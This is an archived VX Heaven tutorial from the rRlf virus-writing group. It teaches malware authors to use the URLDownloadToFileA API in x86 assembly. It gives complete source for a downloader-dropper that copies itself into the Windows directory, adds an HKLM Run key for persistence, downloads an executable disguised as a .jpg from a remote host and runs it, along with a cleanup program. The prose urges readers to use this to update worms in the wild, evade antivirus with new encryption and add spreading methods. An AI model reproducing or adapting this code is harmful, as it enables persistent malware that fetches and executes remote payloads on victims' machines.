Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Up to Date with the URLDownloadToFileA API

DiA
Ready Rangers Liberation Front [5]
June 2004

[Back to index] [Comments]

Intro

Hello again, today I want to show you a method to download a file from the internet (http) to the local machine. It's very easy with the URLDownloadToFileA API, but this API is not much commented. So I resulute to write this tutorial. I hope with this codes you are Up to Date =). Have fun...

The API

First of all I must say that I test this only on Windows98SE OS! But I think on other Win OS's it works too.

The API stores in a DLL stored in Windows\System directory. On my machine it is in C:\Windows\System\urlmon.dll . Urlmon is the name of the DLL. We only must load this library to handle with the URLDownloadToFileA API. Look at the Short Example to see how to handle with .dll's. Now I want to give you a short overview to the URLDownloadToFileA API:

        push 0                  ;lpfnCB -> No idea ;) not interessting, simple push a 0
        push 0                  ;dwReserved -> every time push a 0
        push offset szFileName  ;full path of local file eG "C:\DownloadedFile.exe"
        push offset szURL       ;full URL of file to download eG "http://server.cz/DownloadThis.exe
        push 0                  ;pCaller -> simply push a 0
        call URLDownloadToFileA ;call the api, get it from DLL
 

Ok, now I show you how to handle with a DLL file, and get a API call, and the how to download a file from a URL to local machine. Let's do this...

Short Example

;-----cut-----URLtoFILE.asm-----------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 URLtoFILE,,;
;  TLINK32 -Tpe -c -aa URLtoFILE,URLtoFILE,, import32.lib

.386
.model flat
jumps

        extrn LoadLibraryA      :PROC           ;to handle with the urlmon.dll
        extrn GetProcAddress    :PROC           ;to find the API in this DLL
        extrn ExitProcess       :PROC           ;to quit program
        extrn MessageBoxA       :PROC           ;to show a short information

.data
        szDLL           db 'C:\Windows\System\urlmon.dll',0     ;full path to the urlmon DLL
        szAPI           db 'URLDownloadToFileA',0                     ;name of API to find

        szURL           db 'http://home.arcor.de/vx-dia/news.html',0    ;the complete url, with
                                                                ;extension of file!
        szFileName      db 'C:\DiA_news.html',0       ;complete path, the program download now to this
                                                                                ;path on local machine

        oMsg            db 'File download complete!',10,13              ;only a information msg
                            db 'The file is now in C:\DiA_news.html',10,13
                            db '...downloaded from http://home.arcor.de/vx-dia/news.html',10,13
                            db 'with the API URLDownloadToFileA from the URLmon DLL',0

.code
start:

        push    offset szDLL            ;get DLL to handle with it
        call    LoadLibraryA            ;handle is now in eax

        push    offset szAPI            ;search this API address
        push    eax                     ;handle of urlmon.dll
        call    GetProcAddress          ;address now in eax

        push    0                       ;see "The API"
        push    0
        push    offset szFileName       ;full path of file (local)
        push    offset szURL            ;full URL of file (http)
        push    0
        call    eax                     ;call URLDownloadToFileA

        push    0                       ;Information message
        push    offset szAPI
        push    offset oMsg
        push    0
        call    MessageBoxA

        push    0
        call    ExitProcess             ;quit program

end start
 

Usage Examples, theorie

You can do a lot of things, and the greatest is that you can everytime upload a other executable file to your (or other) server. Here are some Usage Examples, I think that would be kewl:

Update your malware
You found a bug in your code, but your shitty malware is in the wild?! No problemo, simply write a update program, that fix or overwrites your buggy code. If your update program has a bug too...who cares, write a new one, and upload it.
New Encryption
AV's detected your encrypted virus? Write a new engine and update it. AV's wouldn't detect this new encryption method.
New Spreading Technics
You have write a kewl worm, but it stuck on spreading? Write new Spreading methods, and Update this Worm. Maybe new E-Mail Spreading, or new way's to generate/found Mail addresses.
New Strings
You do a P2P, MassMailer ... and all knows your fake names? Write new Names, Subjects, Bodys or Attachments and update your Worm.
Desinfect the Sytem
Microsoft, CIA, FBI, LKA and Police is hunting you, bacauze your creation is spreading as Hell? Write a desinfect program for your Virus/Worm, upload it and the Virus/Worm will remove itself. This Method I show in the next two parts.

Injection Example

;-----cut-----Inject.asm--------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Inject,,;
;  TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib

.386
.model flat
jumps

        extrn GetCommandLineA           :PROC
        extrn lstrcpyA                  :PROC
        extrn GetWindowsDirectoryA      :PROC
        extrn lstrcatA                  :PROC
        extrn CopyFileA                 :PROC
        extrn RegOpenKeyExA             :PROC
        extrn RegSetValueExA            :PROC
        extrn RegCloseKey               :PROC
        extrn LoadLibraryA              :PROC
        extrn GetProcAddress            :PROC
        extrn CreateProcessA            :PROC
        extrn ExitProcess               :PROC

.data

        ThisFile        db 260d dup (0)                         ;save the commandline

        WindowsDir      db 260d dup (?)                         ;save here the windows path
        InjectFile      db '\Inject.exe',0                      ;after join this 2 strings:
                                                                ; C:\Windows\Inject.exe

        StartupKey      db 'Software\Microsoft\Windows\CurrentVersion\Run',0   ;to start
                                                                ;Inject.exe every System start
        StartupName     db 'URLtoFILE_Inject',0                 ;value name
                                                                ;value is "C:\Windows\Inject.exe
        RegHandle       dd 0                                    ;to handle with the registry

        URLDownloadToFileA dd ?                                 ;save here address of function

        InjectDLL       db '\System\urlmon.dll',0               ;join with windows directory
        InjectFunction  db 'URLDownloadToFileA',0               ;search for this function in the dll

        InjectURL       db 'http://home.arcor.de/vx-dia/DiA.jpg',0   ;load this file from the i-net
        InjectSaveAs    db '\DiA.exe',0                         ;save (rename) as DiA.exe in the
                                                                ;Windows directory


        Crap            dd 4 dup (?)                            ;only for CreateProcess


.code
Inject:

        call    GetCommandLineA                         ;looks like "C:\Argh.exe" with "

        inc     eax                                     ;remove first "
        push    eax                                     ;copy commandline to
        push    offset ThisFile                         ;a string
        call    lstrcpyA

        mov     esi, offset ThisFile                    ;call GetPoint function t
        call    GetPoint                                ;remove last "
        mov     dword ptr [esi+4],0                     ;erase

        push    260d                                    ;size
        push    offset WindowsDir                       ;save there
        call    GetWindowsDirectoryA

        push    offset InjectFile                       ;join WindowsDir + Filename
        push    offset WindowsDir                       ; C:\Windows\Inject.exe
        call    lstrcatA                                ;the API to join 2 strings

        push    0                                       ;copy ever
        push    offset WindowsDir                       ;copy this file to
        push    offset ThisFile                         ;the windows directory
        call    CopyFileA                               ;copy it

        push    offset RegHandle                        ;save there the handle
        push    001F0000h                               ;read and write to registry
        push    0
        push    offset StartupKey                       ;Run
        push    80000002h                               ;HKEY_LOCAL_MACHINE
        call    RegOpenKeyExA                           ;open key

        push    260d                                    ;size
        push    offset WindowsDir                       ; C:\Windows\Inject.exe
        push    1                                       ;string
        push    0
        push    offset StartupName                      ;value name
        push    dword ptr [RegHandle]                   ;saved handle
        call    RegSetValueExA

        push    dword ptr [RegHandle]
        call    RegCloseKey                             ;close handle

        push    260d                                    ;size
        push    offset WindowsDir                       ;save there
        call    GetWindowsDirectoryA

        push    offset InjectDLL                        ;join WindowsDir + DLL Filename
        push    offset WindowsDir                       ; C:\Windows\System\urlmon.dll
        call    lstrcatA

        push    offset WindowsDir                       ;load library
        call    LoadLibraryA                            ;to get API

        push    offset InjectFunction                   ;function to search
        push    eax                                     ;library handle
        call    GetProcAddress                          ;now in eax
        mov     URLDownloadToFileA, eax                 ;save address of function

        push    260d                                    ;size
        push    offset WindowsDir                       ;save there
        call    GetWindowsDirectoryA

        push    offset InjectSaveAs                     ;join WindowsDir + downloaded code
        push    offset WindowsDir                       ; C:\Windows\DiA.exe
        call    lstrcatA

        push    0
        push    0
        push    offset WindowsDir                       ;save local as "DiA.exe"
        push    offset InjectURL                        ;get file from this address
        push    0
        call    URLDownloadToFileA                      ;call URLDownloadToFileA

        push    offset Crap                             ;execute downloaded file
        push    offset Crap
        push    0
        push    0
        push    10h                                     ;create new process
        push    0
        push    0
        push    0
        push    offset WindowsDir                       ;first downloaded...
        push    offset WindowsDir                       ;...and then executed - DiA.exe
        call    CreateProcessA

        push    0
        call    ExitProcess                             ;the end


GetPoint:                                               ;the good old procedure
        cmp     byte ptr [esi],'.'                      ;is byte a '.'
        jz      FoundPoint                              ;if yes, return
        inc     esi                                     ;if not, inc esi
        jmp     GetPoint                                ;search again
        FoundPoint:                                     ;label
ret                                                     ;return

end Inject
;-----cut-----Inject.asm--------------------------------------------------------------------
 

Outjection Example

;-----cut-----Outject.asm-------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Inject,,;
;  TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib

.386
.model flat
jumps

        extrn RegOpenKeyExA             :PROC
        extrn RegDeleteValueA           :PROC
        extrn RegCloseKey               :PROC
        extrn GetWindowsDirectoryA      :PROC
        extrn SetCurrentDirectoryA      :PROC
        extrn DeleteFileA               :PROC
        extrn MessageBoxA               :PROC
        extrn ExitProcess               :PROC

.data

        StartupKey      db 'Software\Microsoft\Windows\CurrentVersion\Run',0
        StartupName     db 'URLtoFILE_Inject',0                 ;delete this value

        RegHandle       dd 0                                    ;handle of registry key

        WindowsDir      db 260d dup (?)                         ;save here windows directory

        DiAFile         db 'DiA.exe',0                          ;to delete this file
        InjectFile      db 'Inject.exe',0                       ;delete this too

        oTitle          db 'System is now clean',0
        oMsg            db '- Registry Startup Value deleted',10,13
                        db '- Inject.exe deleted',10,13
                        db '- DiA.exe (this file) deleted',10,13,10,13
                        db 'by DiA[rRlf] (c)04 GermanY - www.vx-dia.de.vu',0

.code
Outject:

        push    0
        push    offset oTitle
        push    offset oMsg
        push    0
        call    MessageBoxA

        push    offset RegHandle                        ;save here the handle
        push    001F0000h                               ;read and write
        push    0
        push    offset StartupKey                       ;Run
        push    80000002h                               ;HKEY_LOCAL_MACHINE
        call    RegOpenKeyExA                           ;open key

        push    offset StartupName                      ;delete this
        push    dword ptr [RegHandle]                   ;get handle
        call    RegDeleteValueA

        push    dword ptr [RegHandle]
        call    RegCloseKey                             ;close this handle

        push    260d                                    ;size
        push    offset WindowsDir                       ;save there
        call    GetWindowsDirectoryA

        push    offset WindowsDir                       ;eG C:\Windows
        call    SetCurrentDirectoryA                    ;cd

        push    offset InjectFile
        call    DeleteFileA                             ;delete Inject.exe

        push    offset DiAFile                          ;delete DiA.exe
        call    DeleteFileA

        push    0
        call    ExitProcess                             ;exit

end Outject
;-----cut-----Outject.asm-------------------------------------------------------------------
 

Outro

With this API it's in your hand what your malware does! You have the full control (pseudo remote control ;) - prc =)) for it. You can update it to the perfection of it self, and if your creation is too hot, and infect's all but you don't want that, simple write a small desinfection application. I hope you learned from this tutorial, and if you has comments, bugs, greetz, fucks.. please mail to [email protected]

OK ppl, we see us in the next tutorial, have a lot of fun-time, don't drink too much ;)

DiA[rRlf] - 07.06.04
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua